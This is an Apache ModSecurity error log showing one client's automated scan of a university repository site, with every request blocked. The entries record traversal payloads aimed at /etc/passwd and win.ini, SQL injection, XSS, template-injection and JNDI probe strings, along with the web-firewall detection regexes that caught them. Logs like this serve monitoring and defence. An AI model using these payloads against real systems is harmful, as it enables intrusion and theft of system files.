[Tue Aug 29 11:44:48.381754 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfkzDMAAAAi"]
[Tue Aug 29 11:44:48.436424 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAhMtTwAAAAM"]
[Tue Aug 29 11:44:48.489479 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAfkzDcAAAAi"]
[Tue Aug 29 11:44:49.392595 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAfiYrQAAAAg"]
[Tue Aug 29 11:44:50.516741 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfg73wAAAAe"]
[Tue Aug 29 11:44:51.493249 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAhMtUUAAAAM"]
[Tue Aug 29 11:44:53.472154 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAe3@HUAAAAA"]
[Tue Aug 29 11:44:56.567639 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAgzyRcAAAAF"]
[Tue Aug 29 11:44:58.395619 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAgzySAAAAAF"]
[Tue Aug 29 11:44:59.390992 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAhab84AAAAW"]
[Tue Aug 29 11:45:00.987940 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhlz3MAAAAi"]
[Tue Aug 29 11:45:01.119499 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAh7wrwAAAA5"]
[Tue Aug 29 11:45:02.436412 2023] [:error] [pid 2164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAh0rToAAAAy"]
[Tue Aug 29 11:45:03.391436 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAhxwkoAAAAv"]
[Tue Aug 29 11:45:04.433816 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAgzySgAAAAF"]
[Tue Aug 29 11:45:05.350939 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhhcvgAAAAd"]
[Tue Aug 29 11:45:05.360769 2023] [:error] [pid 2170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAh6rJUAAAA4"]
[Tue Aug 29 11:45:05.385662 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAdOehYAAAAS"]
[Tue Aug 29 11:45:06.376728 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAhhcvsAAAAd"]
[Tue Aug 29 11:45:07.355974 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAhkLeoAAAAh"]
[Tue Aug 29 11:45:10.434496 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAc4E4AAAAAP"]
[Tue Aug 29 11:45:11.406286 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAg-pOEAAAAR"]
[Tue Aug 29 11:45:12.374690 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAh3f6wAAAA1"]
[Tue Aug 29 11:45:13.416848 2023] [:error] [pid 2160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAhwxl4AAAAt"]
[Tue Aug 29 11:45:15.368664 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAh3f68AAAA1"]
[Tue Aug 29 11:45:16.423567 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAARphKkAAAAU"]
[Tue Aug 29 11:45:17.360306 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAfbkwcAAAAZ"]
[Tue Aug 29 11:45:17.429225 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhtjcoAAAAq"]
[Tue Aug 29 11:45:19.379313 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhhcw8AAAAd"]
[Tue Aug 29 11:45:20.403522 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhMtWwAAAAM"]
[Tue Aug 29 11:45:23.378705 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhrqH0AAAAo"]
[Tue Aug 29 11:45:24.357163 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAfbkxMAAAAZ"]
[Tue Aug 29 11:45:24.373671 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAh7wuAAAAA5"]
[Tue Aug 29 11:45:25.384376 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAfiYu8AAAAg"]
[Tue Aug 29 11:45:25.394203 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAh7wuMAAAA5"]
[Tue Aug 29 11:45:25.407827 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhtjdQAAAAq"]
[Tue Aug 29 11:45:26.407051 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAfSWkAAAAAB"]
